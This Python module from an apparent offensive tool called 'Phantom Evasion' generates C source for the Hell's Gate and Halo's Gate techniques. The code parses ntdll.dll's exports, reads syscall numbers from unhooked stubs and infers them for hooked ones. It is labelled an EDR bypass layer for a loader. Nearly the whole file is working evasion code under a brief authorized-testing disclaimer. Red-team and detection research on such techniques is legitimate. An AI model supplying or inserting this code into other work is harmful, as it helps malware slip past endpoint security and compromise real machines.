"""
Phantom Evasion - Hell's Gate SSN Resolution

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_hells_gate() -> Dict[str, Any]:
    """Generate C code implementing the Hell's Gate technique.

    Hell's Gate dynamically reads Syscall Service Numbers (SSNs) directly
    from the ``ntdll.dll`` in memory by pattern-matching the standard NT
    syscall prologue:
        ``4C 8B D1``  – mov r10, rcx
        ``B8 xx xx xx xx`` – mov eax, <SSN>
        ``0F 05``     – syscall
        ``C3``        – ret

    If the prologue is hooked (first two bytes are ``E9`` JMP or ``FF 25``
    indirect JMP), Halo's Gate "halos" upward/downward to find an adjacent
    unhooked stub and infers the SSN by arithmetic.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_HELLS_GATE_DEFINED__
#define __PHANTOM_HELLS_GATE_DEFINED__
// Hell's Gate – SSN Resolution – generated by Phantom Evasion
// Layer 2 – EDR Bypass
// Reads syscall service numbers directly from ntdll.dll in memory,
// with Halo's Gate fallback for hooked stubs.

#include <windows.h>

// Inline winternl.h types for MinGW compatibility
#ifndef __PHANTOM_WINTERNL_DEFINED__
#define __PHANTOM_WINTERNL_DEFINED__
#ifndef _NTDEF_
typedef LONG NTSTATUS, *PNTSTATUS;
typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } CLIENT_ID, *PCLIENT_ID;
#endif /* _NTDEF_ */
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif
typedef struct _RTL_USER_PROCESS_PARAMETERS { BYTE Reserved1[16]; PVOID Reserved2[10]; UNICODE_STRING ImagePathName; UNICODE_STRING CommandLine; } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; LIST_ENTRY InInitializationOrderLinks; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
typedef struct _PEB_LDR_DATA { ULONG Length; BOOL Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA;
typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; BYTE Reserved2[21]; PPEB_LDR_DATA Ldr; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; BYTE Reserved3[520]; PVOID PostProcessInitRoutine; BYTE Reserved4[136]; ULONG SessionId; } PEB, *PPEB;
#endif /* __PHANTOM_WINTERNL_DEFINED__ */

#define NT_SYSCALL_PROLOGUE_1  0x4C  // mov r10, rcx
#define NT_SYSCALL_PROLOGUE_2  0x8B
#define NT_SYSCALL_PROLOGUE_3  0xD1
#define NT_SYSCALL_MOV_EAX     0xB8  // mov eax, imm32

typedef struct _SYSCALL_ENTRY {
    DWORD  hash;
    DWORD  ssn;
    LPVOID address;
} SYSCALL_ENTRY;

/**
 * Attempt to read the SSN from the NT function stub at *addr*.
 * Returns the SSN on success, or (DWORD)-1 if the stub is hooked.
 */
static DWORD read_ssn_from_stub(BYTE *addr) {
    // Standard unhooked prologue: 4C 8B D1 B8 <SSN-lo> <SSN-hi> 00 00
    if (addr[0] == NT_SYSCALL_PROLOGUE_1 &&
        addr[1] == NT_SYSCALL_PROLOGUE_2 &&
        addr[2] == NT_SYSCALL_PROLOGUE_3 &&
        addr[3] == NT_SYSCALL_MOV_EAX) {
        return *(DWORD *)(addr + 4);
    }
    return (DWORD)-1;
}

/**
 * Resolve the SSN for an Nt* function by name using Hell's Gate.
 * Falls back to Halo's Gate (adjacent stub arithmetic) if the target is hooked.
 */
static DWORD hells_gate_resolve(const char *nt_func_name) {
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) return (DWORD)-1;

    // Locate the export
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hNtdll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE *)hNtdll + dos->e_lfanew);
    DWORD exp_rva =
        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!exp_rva) return (DWORD)-1;

    PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)((BYTE *)hNtdll + exp_rva);
    DWORD *names     = (DWORD *)((BYTE *)hNtdll + exp->AddressOfNames);
    WORD  *ordinals  = (WORD  *)((BYTE *)hNtdll + exp->AddressOfNameOrdinals);
    DWORD *functions = (DWORD *)((BYTE *)hNtdll + exp->AddressOfFunctions);

    for (DWORD i = 0; i < exp->NumberOfNames; i++) {
        const char *name = (const char *)((BYTE *)hNtdll + names[i]);
        if (strcmp(name, nt_func_name) == 0) {
            BYTE *stub = (BYTE *)hNtdll + functions[ordinals[i]];

            // Direct read
            DWORD ssn = read_ssn_from_stub(stub);
            if (ssn != (DWORD)-1) return ssn;

            // Halo's Gate – search adjacent stubs
            // NT syscall stubs are ~32 bytes apart and SSNs are sequential.
            for (int delta = 1; delta <= 32; delta++) {
                // Search upward (lower SSN)
                BYTE *up = stub - (delta * 32);
                ssn = read_ssn_from_stub(up);
                if (ssn != (DWORD)-1) return ssn + delta;

                // Search downward (higher SSN)
                BYTE *down = stub + (delta * 32);
                ssn = read_ssn_from_stub(down);
                if (ssn != (DWORD)-1 && ssn >= (DWORD)delta)
                    return ssn - delta;
            }
            return (DWORD)-1;
        }
    }
    return (DWORD)-1;
}

/**
 * Populate an array of SYSCALL_ENTRY structs.
 * Call once during loader initialisation.
 *
 * Example:
 *   DWORD ssn = hells_gate_resolve("NtAllocateVirtualMemory");
 */
#endif /* __PHANTOM_HELLS_GATE_DEFINED__ */
"""

    return {
        "code": code,
        "description": "Hell's Gate + Halo's Gate SSN resolution from live ntdll.dll",
        "layer": "Layer 2 - EDR Bypass",
        "name": "hells_gate",
    }
